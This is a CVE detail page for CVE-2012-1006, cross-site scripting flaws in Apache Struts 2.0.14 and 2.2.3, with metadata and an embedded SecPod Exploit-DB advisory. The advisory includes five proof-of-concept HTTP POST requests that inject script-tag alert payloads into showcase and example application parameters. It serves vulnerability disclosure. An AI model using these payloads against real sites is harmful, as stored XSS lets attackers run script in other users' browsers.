CVE-2012-1006 : Detail

CVE-2012-1006

Cross-site Scripting
A03-Injection
61.37%V3
Network
2012-02-07
01h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 18452

Publication date : 2012-02-01 23h00 +00:00
Author : SecPod Research
EDB Verified : No

############################################################################## # # Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities # Author : Antu Sanadi SecPod Technologies (www.secpod.com) # Vendor : http://struts.apache.org/ # Advisory : http://secpod.org/blog/?p=450 # http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt # Software : Apache struts 1.3.10, 2.0.14 and 2.2.3 # Date : 01/02/2012 # ############################################################################## SecPod ID: 1021 21/07/2011 Issue Discovered 03/08/2011 Vendor Notified No Response 01/02/2012 Advisory Released Class: Cross-Site Scripting (Persistence) Severity: High Overview: --------- Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities. Technical Description: ---------------------- Multiple persistence Cross-Site Scripting vulnerabilities are present in Apache Struts, as it fails to sanitise user-supplied input. i) Input passed via the 'name' and 'lastName' parameter in '/struts2-showcase/person/editPerson.action' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. ii) Input passed via the 'clientName' parameter in '/struts2-rest-showcase/orders' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. iii) Input passed via the 'name' parameter in '/struts-examples/upload/upload-submit.do?queryParam=Successful' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. iV) Input passed via the 'message' parameter in '/struts-cookbook/processSimple.do' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. V) Input passed via the 'message' parameter in '/struts-cookbook/processSimple.do' action is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. These vulnerabilities have been tested on Apache Struts2 v2.2.3, Apache Struts2 v2.0.14 and Apache Struts v1.3.10. Other versions may also be affected. Impact: -------- Successful exploitation could allow an attacker to execute arbitrary HTML code in a user's browser session in the context of a vulnerable application. Affected Software: ------------------ Apache struts 2.2.3 and prior. Tested on, i) Apache struts 2.2.3 - Stored XSS - struts2-showcase-2.2.3 - struts2-rest-showcase-2.2.3 ii) Apache struts 2.0.14 - Stored XSS - struts2-showcase-2.0.14 iii) Apache struts 1.3.10 - Reflected XSS - struts-cookbook-1.3.10 - struts-examples-1.3.10 References: ----------- http://struts.apache.org http://secpod.org/blog/?p=450 Proof of Concept: ----------------- POC 1: ----- Stored XSS POST struts2-showcase/person/editPerson.action HTTP/1.1 Host: SERVER_IP:8080 User-Agent: struts2-showcase XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 192 Post Data: ---------- persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript %3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2 Fscript%3E&method%3Asave=Save+all+persons POC 2: ----- Stored XSS POST /struts2-rest-showcase/orders HTTP/1.1 Host: SERVER_IP:8080 User-Agent: struts2-rest-showcase XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 78 Post Data: ---------- clientName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E&amount= POC 3: ----- Reflected XSS POST /struts-examples/upload/upload-submit.do?queryParam=Successful HTTP/1.1 Host: SERVER_IP:8080 User-Agent: Struts-examples XSS-TEST Content-Type: multipart/form-data; boundary=---------------------------41701 161044225432961947041 Content-Length: 481 Post Data: ---------- -----------------------------41701161044225432961947041\r\n Content-Disposition: form-data; name="theText"\r\n \r\n <script>alert("SecPod-XSS-TEST")</script>\r\n -----------------------------41701161044225432961947041\r\n Content-Disposition: form-data; name="theFile"; filename=""\r\n Content-Type: application/octet-stream\r\n \r\n \r\n -----------------------------41701161044225432961947041\r\n Content-Disposition: form-data; name="filePath"\r\n \r\n \r\n -----------------------------41701161044225432961947041--\r\n POC 4: ----- Reflected XSS POST /struts-cookbook/processSimple.do HTTP/1.1 Host: SERVER_IP:8080 User-Agent:Struts-cookbook XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 118 Post Data: ---------- name=XYZ&secret=XYZ&color=red&confirm=on&rating=1&message=%3Cscript%3Ealert %28%22SecPod-XSS-TEST%22%29%3C%2Fscript%3E& POC 5: ----- Reflected XSS POST /struts-cookbook/processDyna.do HTTP/1.1 Host: SERVER_IP:8080 User-Agent:Struts-cookbook XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 95 Post Data: ---------- name=ZYZ&secret=&color=red&message=%3Cscript%3Ealert%28%22SecPod-XSS-TEST %22%29%3C%2Fscript%3E& Solution: --------- Fix not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = NONE CONFIDENTIALITY_IMPACT = PARTIAL INTEGRITY_IMPACT = PARTIAL AVAILABILITY_IMPACT = NONE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 6.4 (High) (AV:N/AC:L/Au:N/C:N/I:P/A:N) Credits: -------- Antu Sanadi of SecPod Technologies has been credited with the discovery of this vulnerability.

Products Mentioned

Configuraton 0

Apache>>Struts >> Version 2.0.14

Apache>>Struts >> Version 2.2.3

References

http://secpod.org/blog/?p=450
Tags : x_refsource_MISC
http://www.securityfocus.com/bid/51902
Tags : vdb-entry, x_refsource_BID